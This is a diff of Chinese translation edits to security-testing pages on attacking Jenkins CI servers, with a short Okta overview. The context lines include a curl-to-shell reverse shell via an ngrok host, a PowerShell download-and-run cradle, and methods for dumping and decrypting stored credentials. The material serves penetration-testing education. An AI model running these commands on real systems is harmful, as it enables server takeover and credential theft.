+许多组织将 **基于SaaS的源代码管理(SCM)系统**(如 GitHub 或 GitLab)与 **内部自托管的 CI** 解决方案(如 Jenkins 或 TeamCity)结合使用。此设置允许 CI 系统 **接收来自 SaaS 源代码供应商的 webhook 事件**,主要用于触发管道作业。
-为了实现这一点,组织 **将 SCM 平台的 IP 范围列入白名单**,允许它们通过 **webhooks** 访问 **内部 CI 系统**。然而,重要的是要注意,**任何人**都可以在 GitHub 或 GitLab 上创建一个 **账户** 并将其配置为 **触发 webhook**,可能会向 **内部 CI 系统** 发送请求。
+为了实现这一点,组织 **将 SCM 平台的 IP 范围列入白名单**,允许它们通过 **webhooks** 访问 **内部 CI 系统**。然而,重要的是要注意 **任何人** 都可以在 GitHub 或 GitLab 上创建一个 **账户** 并将其配置为 **触发 webhook**,可能会向 **内部 CI 系统** 发送请求。
检查: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/)
## 内部 Jenkins 滥用
-在这些场景中,我们假设您有一个有效的账户来访问 Jenkins。
+在这些场景中,我们假设您拥有访问 Jenkins 的有效账户。
> [!WARNING]
-> 根据在 Jenkins 中配置的 **授权** 机制和被攻陷用户的权限,您 **可能能够或无法执行以下攻击**。
+> 根据 Jenkins 中配置的 **授权** 机制和被攻击用户的权限,您 **可能能够或无法执行以下攻击。**
有关更多信息,请查看基本信息:
@@ -85,7 +83,7 @@ basic-jenkins-information.md
### 转储构建以查找明文秘密
-使用 [这个脚本](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) 转储构建控制台输出和构建环境变量,以希望找到明文秘密。
+使用 [this script](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) 转储构建控制台输出和构建环境变量,以希望找到明文秘密。
```bash
python3 jenkins_dump_builds.py -u alice -p alice http://127.0.0.1:8080/ -o build_dumps
cd build_dumps
@@ -93,7 +91,7 @@ gitleaks detect --no-git -v
```
### **窃取 SSH 凭证**
-如果被攻陷的用户具有 **足够的权限来创建/修改新的 Jenkins 节点**,并且 SSH 凭证已经存储以访问其他节点,他可以通过创建/修改一个节点并 **设置一个将记录凭证的主机** 而不验证主机密钥来 **窃取这些凭证**:
+如果被攻击的用户具有 **足够的权限来创建/修改新的 Jenkins 节点**,并且 SSH 凭证已经存储以访问其他节点,他可以通过创建/修改一个节点并 **设置一个将记录凭证的主机** 而不验证主机密钥来 **窃取这些凭证**:
.png>)
@@ -101,13 +99,13 @@ gitleaks detect --no-git -v
### **Jenkins 中的 RCE**
-在 Jenkins 服务器上获得 **shell** 使攻击者有机会泄露所有 **秘密** 和 **环境变量**,并 **利用同一网络中的其他机器**,甚至 **收集云凭证**。
+在 Jenkins 服务器上获得 **shell** 使攻击者有机会泄露所有 **秘密** 和 **环境变量**,并 **利用同一网络中** 的其他机器,甚至 **收集云凭证**。
默认情况下,Jenkins 将 **以 SYSTEM 身份运行**。因此,攻陷它将使攻击者获得 **SYSTEM 权限**。
### **创建/修改项目的 RCE**
-创建/修改项目是获得 Jenkins 服务器 RCE 的一种方式:
+创建/修改项目是一种获得 Jenkins 服务器 RCE 的方式:
{{#ref}}
jenkins-rce-creating-modifying-project.md
@@ -115,7 +113,7 @@ jenkins-rce-creating-modifying-project.md
### **执行 Groovy 脚本的 RCE**
-您还可以通过执行 Groovy 脚本来获得 RCE,这可能比创建新项目更隐蔽:
+您还可以通过执行 Groovy 脚本获得 RCE,这可能比创建新项目更隐蔽:
{{#ref}}
jenkins-rce-with-groovy-script.md
@@ -135,7 +133,7 @@ jenkins-rce-creating-modifying-pipeline.md
### 构建管道
-**管道** 也可以用作 **项目中的构建机制**,在这种情况下,可以配置一个 **存储库中的文件**,该文件将包含管道语法。默认使用 `/Jenkinsfile`:
+**管道** 也可以用作 **项目中的构建机制**,在这种情况下,可以配置一个 **存储库中的文件**,该文件将包含管道语法。默认情况下使用 `/Jenkinsfile`:
.png>)
@@ -146,16 +144,16 @@ jenkins-rce-creating-modifying-pipeline.md
执行自定义管道的最常见触发器是:
-- **向主分支的拉取请求**(或可能是其他分支)
-- **推送到主分支**(或可能是其他分支)
+- **对主分支的拉取请求**(或可能对其他分支)
+- **推送到主分支**(或可能对其他分支)
- **更新主分支** 并等待以某种方式执行
> [!NOTE]
-> 如果您是 **外部用户**,您不应该期望创建 **PR 到其他用户/组织的主分支** 并 **触发管道**... 但如果配置 **不当**,您可能会通过利用这一点完全 **攻陷公司**。
+> 如果您是 **外部用户**,您不应该期望创建 **PR 到其他用户/组织的主分支** 并 **触发管道**...但如果配置 **不当**,您可能会通过利用这一点完全 **攻陷公司**。
### 管道 RCE
-在前面的 RCE 部分中,已经指明了一种技术来 [**通过修改管道获取 RCE**](./#rce-creating-modifying-pipeline)。
+在前面的 RCE 部分中已经指明了一种技术来 [**通过修改管道获取 RCE**](./#rce-creating-modifying-pipeline)。
### 检查环境变量
@@ -176,7 +174,7 @@ steps {
```
### Dumping secrets
-有关Jenkins通常如何处理秘密的信息,请查看基本信息:
+有关 Jenkins 通常如何处理秘密的信息,请查看基本信息:
{{#ref}}
basic-jenkins-information.md
@@ -184,7 +182,7 @@ basic-jenkins-information.md
凭据可以**作用于全局提供者**(`/credentials/`)或**特定项目**(`/job//configure`)。因此,为了提取所有凭据,您需要**至少妥协所有包含秘密的项目**并执行自定义/被污染的管道。
-还有另一个问题,为了在管道的**环境中获取一个秘密**,您需要**知道秘密的名称和类型**。例如,如果您尝试将一个**`usernamePassword`** **秘密**作为**`string`** **秘密**加载,您将收到此**错误**:
+还有另一个问题,为了在管道的**环境中获取一个秘密**,您需要**知道秘密的名称和类型**。例如,如果您尝试将一个**`usernamePassword`** **秘密**作为**`string`** **秘密**加载,您将会收到此**错误**:
```
ERROR: Credentials 'flag2' is of type 'Username with password' where 'org.jenkinsci.plugins.plaincredentials.StringCredentials' was expected
```
@@ -216,17 +214,17 @@ env
'''
}
```
-在本页面的末尾,您可以**找到所有凭证类型**:[https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
+在本页的末尾,您可以**找到所有凭证类型**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
> [!WARNING]
-> **一次性转储所有秘密**的最佳方法是**妥协****Jenkins**机器(例如在**内置节点**中运行反向 shell),然后**泄露****主密钥**和**加密秘密**并离线解密它们。\
-> 有关如何执行此操作的更多信息,请参见[节点和代理部分](./#nodes-and-agents)和[后期利用部分](./#post-exploitation)。
+> **一次性转储所有秘密**的最佳方法是**妥协****Jenkins**机器(例如在**内置节点**上运行反向 shell),然后**泄露****主密钥**和**加密秘密**并离线解密它们。\
+> 有关如何在[节点和代理部分](./#nodes-and-agents)和[后期利用部分](./#post-exploitation)中执行此操作的更多信息。
### 触发器
-来自[文档](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers):`triggers`指令定义了**管道应重新触发的自动方式**。对于与 GitHub 或 BitBucket 等源集成的管道,`triggers`可能不是必需的,因为基于 webhook 的集成可能已经存在。当前可用的触发器有`cron`、`pollSCM`和`upstream`。
+来自[文档](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers):`triggers`指令定义了**管道应重新触发的自动方式**。对于与GitHub或BitBucket等源集成的管道,`triggers`可能不是必需的,因为基于webhook的集成可能已经存在。目前可用的触发器有`cron`、`pollSCM`和`upstream`。
-Cron 示例:
+Cron示例:
```bash
triggers { cron('H */4 * * 1-5') }
```
@@ -365,14 +363,14 @@ println(hudson.util.Secret.decrypt("{...}"))
```
### 创建新管理员用户
-1. 访问 Jenkins config.xml 文件在 `/var/lib/jenkins/config.xml` 或 `C:\Program Files (x86)\Jenkins\`
-2. 搜索词 `true ` 并将 **`true`** 改为 **`false`**。
+1. 访问 Jenkins config.xml 文件在 `/var/lib/jenkins/config.xml` 或 `C:\Program Files (x86)\Jenkis\`
+2. 搜索 `true ` 并将 **`true`** 改为 **`false`**。
1. `sed -i -e 's/truefalsetrue ` 再次 **启用** **安全性**,并 **再次重启 Jenkins**。
-## 参考文献
+## 参考
- [https://github.com/gquere/pwn_jenkins](https://github.com/gquere/pwn_jenkins)
- [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/)
diff --git a/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
index 87e50d856..e1e4f486e 100644
--- a/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
+++ b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
@@ -1,87 +1,87 @@
-# Basic Jenkins Information
+# 基本的 Jenkins 信息
{{#include ../../banners/hacktricks-training.md}}
-## Access
+## 访问
-### Username + Password
+### 用户名 + 密码
-在Jenkins中登录的最常见方式是使用用户名或密码。
+在 Jenkins 中登录的最常见方式是使用用户名或密码。
### Cookie
-如果**授权的cookie被盗取**,它可以用于访问用户的会话。该cookie通常被称为`JSESSIONID.*`。(用户可以终止所有会话,但他需要首先发现cookie被盗取)。
+如果 **授权的 Cookie 被盗取**,它可以用来访问用户的会话。这个 Cookie 通常被称为 `JSESSIONID.*`。(用户可以终止所有会话,但他需要先发现 Cookie 被盗取)。
-### SSO/Plugins
+### SSO/插件
-Jenkins可以通过插件配置为**通过第三方SSO访问**。
+Jenkins 可以通过插件配置为 **通过第三方 SSO 访问**。
-### Tokens
+### 令牌
-**用户可以生成令牌**以允许应用程序通过CLI或REST API冒充他们。
+**用户可以生成令牌**,以便通过 CLI 或 REST API 让应用程序冒充他们。
-### SSH Keys
+### SSH 密钥
-该组件为Jenkins提供了内置的SSH服务器。这是[Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/)的替代接口,可以使用任何SSH客户端以这种方式调用命令。(来自[docs](https://plugins.jenkins.io/sshd/))
+此组件为 Jenkins 提供内置的 SSH 服务器。这是 [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/) 的替代接口,可以使用任何 SSH 客户端以这种方式调用命令。(来自 [docs](https://plugins.jenkins.io/sshd/))
-## Authorization
+## 授权
-在`/configureSecurity`中,可以**配置Jenkins的授权方法**。有几种选项:
+在 `/configureSecurity` 中,可以 **配置 Jenkins 的授权方法**。有几种选项:
- **任何人都可以做任何事**:甚至匿名访问也可以管理服务器。
-- **遗留模式**:与Jenkins <1.164相同。如果您拥有**“admin”角色**,您将获得**对系统的完全控制**,否则(包括**匿名**用户)您将只有**读取**权限。
-- **登录用户可以做任何事**:在此模式下,每个**登录用户获得Jenkins的完全控制**。唯一没有完全控制的用户是**匿名用户**,他们只有**读取权限**。
-- **基于矩阵的安全性**:您可以在表中配置**谁可以做什么**。每个**列**代表一个**权限**。每个**行**代表一个**用户或组/角色**。这包括一个特殊用户'**anonymous**',代表**未认证用户**,以及'**authenticated**',代表**所有已认证用户**。
+- **遗留模式**:与 Jenkins <1.164 相同。如果你拥有 **"admin" 角色**,你将获得 **对系统的完全控制**,否则(包括 **匿名** 用户)你将只有 **读取** 权限。
+- **已登录用户可以做任何事**:在此模式下,每个 **已登录用户获得对 Jenkins 的完全控制**。唯一没有完全控制的用户是 **匿名用户**,他们只有 **读取权限**。
+- **基于矩阵的安全性**:你可以在表中配置 **谁可以做什么**。每个 **列** 代表一个 **权限**。每个 **行** 代表一个 **用户或组/角色**。这包括一个特殊用户 '**anonymous**',代表 **未认证用户**,以及 '**authenticated**',代表 **所有已认证用户**。
.png>)
-- **基于项目的矩阵授权策略**:此模式是对“**基于矩阵的安全性**”的**扩展**,允许为每个项目单独**定义额外的ACL矩阵**。
-- **基于角色的策略**:允许使用**基于角色的策略**定义授权。在`/role-strategy`中管理角色。
+- **基于项目的矩阵授权策略**:此模式是对 "**基于矩阵的安全性**" 的 **扩展**,允许为每个项目单独 **定义额外的 ACL 矩阵**。
+- **基于角色的策略**:启用使用 **基于角色的策略** 定义授权。在 `/role-strategy` 中管理角色。
-## **Security Realm**
+## **安全领域**
-在`/configureSecurity`中,可以**配置安全领域**。默认情况下,Jenkins支持几种不同的安全领域:
+在 `/configureSecurity` 中,可以 **配置安全领域**。默认情况下,Jenkins 包含对几种不同安全领域的支持:
-- **委托给servlet容器**:用于**委托认证给运行Jenkins控制器的servlet容器**,例如[Jetty](https://www.eclipse.org/jetty/)。
-- **Jenkins自己的用户数据库**:使用**Jenkins自己的内置用户数据存储**进行认证,而不是委托给外部系统。默认启用。
-- **LDAP**:将所有认证委托给配置的LDAP服务器,包括用户和组。
-- **Unix用户/组数据库**:**将认证委托给Jenkins控制器上的底层Unix**操作系统级用户数据库。此模式还允许重用Unix组进行授权。
+- **委托给 Servlet 容器**:用于 **委托认证给运行 Jenkins 控制器的 Servlet 容器**,例如 [Jetty](https://www.eclipse.org/jetty/)。
+- **Jenkins 自己的用户数据库**:使用 **Jenkins 自带的用户数据存储** 进行认证,而不是委托给外部系统。默认启用。
+- **LDAP**:将所有认证委托给配置的 LDAP 服务器,包括用户和组。
+- **Unix 用户/组数据库**:**将认证委托给底层 Unix** 操作系统级用户数据库。此模式还允许重用 Unix 组进行授权。
-插件可以提供额外的安全领域,这可能对将Jenkins纳入现有身份系统有用,例如:
+插件可以提供额外的安全领域,这可能对将 Jenkins 纳入现有身份系统有用,例如:
- [Active Directory](https://plugins.jenkins.io/active-directory)
-- [GitHub Authentication](https://plugins.jenkins.io/github-oauth)
+- [GitHub 认证](https://plugins.jenkins.io/github-oauth)
- [Atlassian Crowd 2](https://plugins.jenkins.io/crowd2)
-## Jenkins Nodes, Agents & Executors
+## Jenkins 节点、代理和执行器
-来自[docs](https://www.jenkins.io/doc/book/managing/nodes/)的定义:
+来自 [docs](https://www.jenkins.io/doc/book/managing/nodes/) 的定义:
-**节点**是**构建代理运行的机器**。Jenkins监控每个附加节点的磁盘空间、可用临时空间、可用交换空间、时钟时间/同步和响应时间。如果这些值中的任何一个超出配置的阈值,则节点将被下线。
+**节点** 是 **构建代理运行的机器**。Jenkins 监控每个附加节点的磁盘空间、可用临时空间、可用交换空间、时钟时间/同步和响应时间。如果这些值中的任何一个超出配置的阈值,节点将被下线。
-**代理**代表Jenkins控制器**管理任务执行**,通过**使用执行器**。代理可以使用任何支持Java的操作系统。构建和测试所需的工具安装在代理运行的节点上;它们可以**直接安装或在容器中安装**(Docker或Kubernetes)。每个**代理实际上是主机上的一个进程,具有自己的PID**。
+**代理** **管理** 代表 Jenkins 控制器的 **任务执行**,通过 **使用执行器**。代理可以使用任何支持 Java 的操作系统。构建和测试所需的工具安装在代理运行的节点上;它们可以 **直接安装或在容器中安装**(Docker 或 Kubernetes)。每个 **代理实际上是主机上的一个进程,具有自己的 PID**。
-**执行器**是**任务执行的插槽**;实际上,它是**代理中的一个线程**。节点上的**执行器数量**定义了可以在该节点上同时执行的**并发任务**的数量。换句话说,这决定了可以在该节点上同时执行的**并发Pipeline `stages`**的数量。
+**执行器** 是 **任务执行的插槽**;实际上,它是 **代理中的一个线程**。节点上的 **执行器数量** 定义了可以在该节点上同时执行的 **并发任务** 数量。换句话说,这决定了可以在该节点上同时执行的 **并发 Pipeline `stages`** 数量。
-## Jenkins Secrets
+## Jenkins 秘密
-### Encryption of Secrets and Credentials
+### 秘密和凭证的加密
-来自[docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials)的定义:Jenkins使用**AES加密和保护秘密**、凭据及其各自的加密密钥。这些加密密钥存储在`$JENKINS_HOME/secrets/`中,以及用于保护这些密钥的主密钥。该目录应配置为仅允许Jenkins控制器运行的操作系统用户具有对该目录的读写访问(即,`chmod`值为`0700`或使用适当的文件属性)。**主密钥**(有时在密码术语中称为“密钥加密密钥”)是**以\_未加密\_形式存储在Jenkins控制器文件系统中的**`$JENKINS_HOME/secrets/master.key`**,这并不能保护直接访问该文件的攻击者。大多数用户和开发人员将通过[Secret](https://javadoc.jenkins.io/byShortName/Secret) API间接使用这些加密密钥,以加密通用秘密数据或通过凭据API。对于对密码学感兴趣的人,Jenkins在密码块链接(CBC)模式下使用AES,使用PKCS#5填充和随机IV加密存储在`$JENKINS_HOME/secrets/`中的[CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey)实例,文件名对应于其`CryptoConfidentialKey` id。常见的密钥id包括:
+来自 [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials) 的定义:Jenkins 使用 **AES 加密和保护秘密**、凭证及其各自的加密密钥。这些加密密钥存储在 `$JENKINS_HOME/secrets/` 中,以及用于保护这些密钥的主密钥。此目录应配置为仅允许运行 Jenkins 控制器的操作系统用户具有读取和写入此目录的权限(即,`chmod` 值为 `0700` 或使用适当的文件属性)。**主密钥**(有时在密码术术语中称为 "密钥加密密钥")是 **以未加密形式存储** 在 Jenkins 控制器文件系统中的 **`$JENKINS_HOME/secrets/master.key`**,这并不能保护直接访问该文件的攻击者。大多数用户和开发人员将通过 [Secret](https://javadoc.jenkins.io/byShortName/Secret) API 间接使用这些加密密钥,以加密通用秘密数据,或通过凭证 API。对于对密码学感兴趣的人,Jenkins 在密码块链(CBC)模式下使用 AES,带有 PKCS#5 填充和随机 IV 来加密存储在 `$JENKINS_HOME/secrets/` 中的 [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) 实例,文件名对应于其 `CryptoConfidentialKey` id。常见的密钥 id 包括:
- `hudson.util.Secret`:用于通用秘密;
-- `com.cloudbees.plugins.credentials.SecretBytes.KEY`:用于某些凭据类型;
-- `jenkins.model.Jenkins.crumbSalt`:由[CSRF保护机制](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery)使用;以及
+- `com.cloudbees.plugins.credentials.SecretBytes.KEY`:用于某些凭证类型;
+- `jenkins.model.Jenkins.crumbSalt`:由 [CSRF 保护机制](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery) 使用;以及
-### Credentials Access
+### 凭证访问
-凭据可以**作用于全局提供者**(`/credentials/`),任何配置的项目都可以访问,或者可以作用于**特定项目**(`/job//configure`),因此仅可从特定项目访问。
+凭证可以 **作用于全局提供者** (`/credentials/`),任何配置的项目都可以访问,或者可以作用于 **特定项目** (`/job//configure`),因此仅可从特定项目访问。
-根据[**docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/):在作用域内的凭据可以无限制地提供给管道。为了**防止在构建日志中意外暴露**,凭据在常规输出中被**屏蔽**,因此调用`env`(Linux)或`set`(Windows),或打印其环境或参数的程序将**不会在构建日志中向本来无法访问凭据的用户显示它们**。
+根据 [**docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/):在作用域内的凭证可以无限制地提供给管道。为了 **防止在构建日志中意外暴露**,凭证从常规输出中 **被屏蔽**,因此 `env`(Linux)或 `set`(Windows)的调用,或打印其环境或参数的程序将 **不会在构建日志中向没有访问凭证的用户显示它们**。
-**这就是为什么攻击者需要,例如,将凭据进行base64编码以提取凭据。**
+**这就是为什么攻击者需要,例如,将凭证进行 base64 编码以提取凭证。**
-## References
+## 参考
- [https://www.jenkins.io/doc/book/security/managing-security/](https://www.jenkins.io/doc/book/security/managing-security/)
- [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
index 445b50180..9c5a71691 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
@@ -4,11 +4,11 @@
在这篇博客文章中,可以找到将Jenkins中的本地文件包含漏洞转化为RCE的好方法:[https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/)
-这是一个AI生成的摘要,内容涉及如何利用任意cookie的构造来获取RCE,利用本地文件读取,直到我有时间自己创建摘要为止:
+这是一个AI生成的摘要,关于如何利用任意cookie的构造来获取RCE,利用本地文件读取,直到我有时间自己创建摘要:
### 攻击前提
-- **功能要求:** “记住我”必须启用(默认设置)。
+- **功能要求:** 必须启用“记住我”(默认设置)。
- **访问级别:** 攻击者需要整体/读取权限。
- **秘密访问:** 能够读取关键文件中的二进制和文本内容。
@@ -100,6 +100,6 @@ curl -X POST "$JENKINS_URL/scriptText" \
- Groovy脚本可用于在Jenkins环境中执行系统级命令或其他操作。
-提供的示例curl命令演示了如何使用必要的头和cookie向Jenkins发送请求,以安全地执行任意代码。
+提供的示例curl命令演示了如何使用必要的头和cookie向Jenkins发送请求以安全地执行任意代码。
{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
index 2da4bb0b5..b445bc31d 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
@@ -1,11 +1,11 @@
-# Jenkins Dumping Secrets from Groovy
+# Jenkins 从 Groovy 中转储秘密
{{#include ../../banners/hacktricks-training.md}}
> [!WARNING]
-> 请注意,这些脚本只会列出 `credentials.xml` 文件中的秘密,但 **构建配置文件** 可能也包含 **更多凭据**。
+> 请注意,这些脚本只会列出 `credentials.xml` 文件中的秘密,但 **构建配置文件** 可能也会有 **更多凭据**。
-您可以通过运行此代码在 `/script` 中 **从 Groovy 脚本控制台转储所有秘密**。
+您可以通过运行以下代码在 `/script` 中 **从 Groovy 脚本控制台转储所有秘密**。
```java
// From https://www.dennisotugo.com/how-to-view-all-jenkins-secrets-credentials/
import jenkins.model.*
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
index 48a4f9952..34d2e6676 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
@@ -8,7 +8,7 @@
.png>)
-在 **Pipeline 部分** 中写入 **reverse shell**:
+在 **Pipeline 部分** 中写入 **reverse shell**:
.png>)
```groovy
@@ -26,7 +26,7 @@ curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
}
}
```
-最后点击 **Save**,然后 **Build Now**,管道将被执行:
+最后点击 **Save** 和 **Build Now**,管道将被执行:
.png>)
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
index f1a0ee3cd..85429a747 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
@@ -4,33 +4,33 @@
## 创建项目
-此方法非常嘈杂,因为您必须创建一个全新的项目(显然,这仅在您允许用户创建新项目时有效)。
+此方法非常嘈杂,因为您必须创建一个全新的项目(显然,这仅在用户被允许创建新项目时有效)。
-1. **创建一个新项目**(自由风格项目),点击“新建项目”或在 `/view/all/newJob`
-2. 在 **构建** 部分设置 **执行 shell**,并粘贴一个 powershell Empire 启动器或一个 meterpreter powershell(可以使用 _unicorn_ 获得)。使用 _PowerShell.exe_ 启动有效载荷,而不是使用 _powershell._
-3. 点击 **立即构建**
-1. 如果 **立即构建** 按钮没有出现,您仍然可以转到 **配置** --> **构建触发器** --> `定期构建` 并设置一个 cron 为 `* * * * *`
-2. 除了使用 cron,您还可以使用配置“**远程触发构建**”,您只需设置一个 api 令牌名称来触发作业。然后转到您的用户配置文件并 **生成一个 API 令牌**(将此 API 令牌称为您用于触发作业的 api 令牌)。最后,使用以下命令触发作业:**`curl :@/job//build?token=`**
+1. **创建一个新项目**(自由风格项目),点击“新建项目”或在`/view/all/newJob`中
+2. 在**构建**部分设置**执行 shell**,并粘贴一个 powershell Empire 启动器或一个 meterpreter powershell(可以使用 _unicorn_ 获得)。使用 _PowerShell.exe_ 启动有效载荷,而不是使用 _powershell_。
+3. 点击**立即构建**
+1. 如果**立即构建**按钮没有出现,您仍然可以转到**配置** --> **构建触发器** --> `定期构建`,并设置一个 cron 为 `* * * * *`
+2. 除了使用 cron,您还可以使用配置“**远程触发构建**”,只需设置一个 api 令牌名称以触发作业。然后转到您的用户配置文件并**生成一个 API 令牌**(将此 API 令牌称为您用于触发作业的 api 令牌)。最后,使用以下命令触发作业:**`curl :@/job//build?token=`**
.png>)
## 修改项目
-转到项目并检查 **您是否可以配置任何** 项目(查找“配置按钮”):
+转到项目并检查**您是否可以配置任何**项目(查找“配置按钮”):
.png>)
-如果您 **看不到任何** **配置** **按钮**,那么您 **可能无法** **配置** 它(但检查所有项目,因为您可能能够配置其中一些而不是其他项目)。
+如果您**看不到任何**配置**按钮**,那么您**可能无法**配置它(但检查所有项目,因为您可能能够配置其中一些而不是其他项目)。
-或者 **尝试访问路径** `/job//configure` 或 `/me/my-views/view/all/job//configure` \_\_ 在每个项目中(示例:`/job/Project0/configure` 或 `/me/my-views/view/all/job/Project0/configure`)。
+或者**尝试访问路径** `/job//configure` 或 `/me/my-views/view/all/job//configure` \_\_ 在每个项目中(示例:`/job/Project0/configure` 或 `/me/my-views/view/all/job/Project0/configure`)。
## 执行
-如果您被允许配置项目,您可以 **使其在构建成功时执行命令**:
+如果您被允许配置项目,您可以**使其在构建成功时执行命令**:
.png>)
-点击 **保存** 并 **构建** 项目,您的 **命令将被执行**。\
-如果您不是在执行反向 shell 而是一个简单命令,您可以 **在构建的输出中查看命令的输出**。
+点击**保存**并**构建**项目,您的**命令将被执行**。\
+如果您不是在执行反向 shell 而是简单命令,您可以**在构建的输出中查看命令的输出**。
{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
index 36e859144..2f5b4d9be 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
@@ -42,9 +42,9 @@ scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc
```
-### Script
+### 脚本
-您可以使用[**此脚本**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py)自动化此过程。
+您可以使用 [**这个脚本**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py) 自动化此过程。
您可以使用 MSF 获取反向 shell:
```
diff --git a/src/pentesting-ci-cd/okta-security/README.md b/src/pentesting-ci-cd/okta-security/README.md
index e871e53b3..791240366 100644
--- a/src/pentesting-ci-cd/okta-security/README.md
+++ b/src/pentesting-ci-cd/okta-security/README.md
@@ -4,7 +4,7 @@
## 基本信息
-[Okta, Inc.](https://www.okta.com/) 在身份和访问管理领域因其基于云的软件解决方案而受到认可。这些解决方案旨在简化和保护各种现代应用程序的用户身份验证。它们不仅服务于希望保护敏感数据的公司,还服务于希望将身份控制集成到应用程序、网络服务和设备中的开发人员。
+[Okta, Inc.](https://www.okta.com/) 在身份和访问管理领域因其基于云的软件解决方案而受到认可。这些解决方案旨在简化和保护各种现代应用程序的用户身份验证。它们不仅满足希望保护敏感数据的公司的需求,还满足希望将身份控制集成到应用程序、网络服务和设备中的开发人员的需求。
Okta 的旗舰产品是 **Okta Identity Cloud**。该平台包含一系列产品,包括但不限于:
@@ -14,10 +14,10 @@ Okta 的旗舰产品是 **Okta Identity Cloud**。该平台包含一系列产品
- **通用目录**:实现用户、组和设备的集中管理。
- **API 访问管理**:保护和管理对 API 的访问。
-这些服务共同旨在加强数据保护并简化用户访问,提高安全性和便利性。Okta 解决方案的多样性使其成为各个行业的热门选择,适合大型企业、小公司和个人开发者。截至 2021 年 9 月的最后更新,Okta 被认为是身份和访问管理 (IAM) 领域的一个重要实体。
+这些服务共同旨在加强数据保护并简化用户访问,提高安全性和便利性。Okta 解决方案的多功能性使其成为各个行业的热门选择,适合大型企业、小公司和个人开发人员。截至 2021 年 9 月的最后更新,Okta 被认为是身份和访问管理 (IAM) 领域的一个重要实体。
> [!CAUTION]
-> Okta 的主要目标是为不同用户和组配置对外部应用程序的访问。如果您设法在 Okta 环境中 **破坏管理员权限**,您很可能能够 **破坏公司使用的所有其他平台**。
+> Okta 的主要目标是为不同用户和组配置对外部应用程序的访问。如果您设法在 Okta 环境中 **破坏管理员权限**,您将很可能能够 **破坏公司使用的所有其他平台**。
> [!TIP]
> 要对 Okta 环境进行安全审查,您应该请求 **管理员只读访问**。
@@ -28,36 +28,36 @@ Okta 的旗舰产品是 **Okta Identity Cloud**。该平台包含一系列产品
这些用户可以在 **组** 内。\
还有 **身份验证器**:不同的身份验证选项,如密码和多种 2FA,如 WebAuthn、电子邮件、电话、Okta Verify(它们可以启用或禁用)...
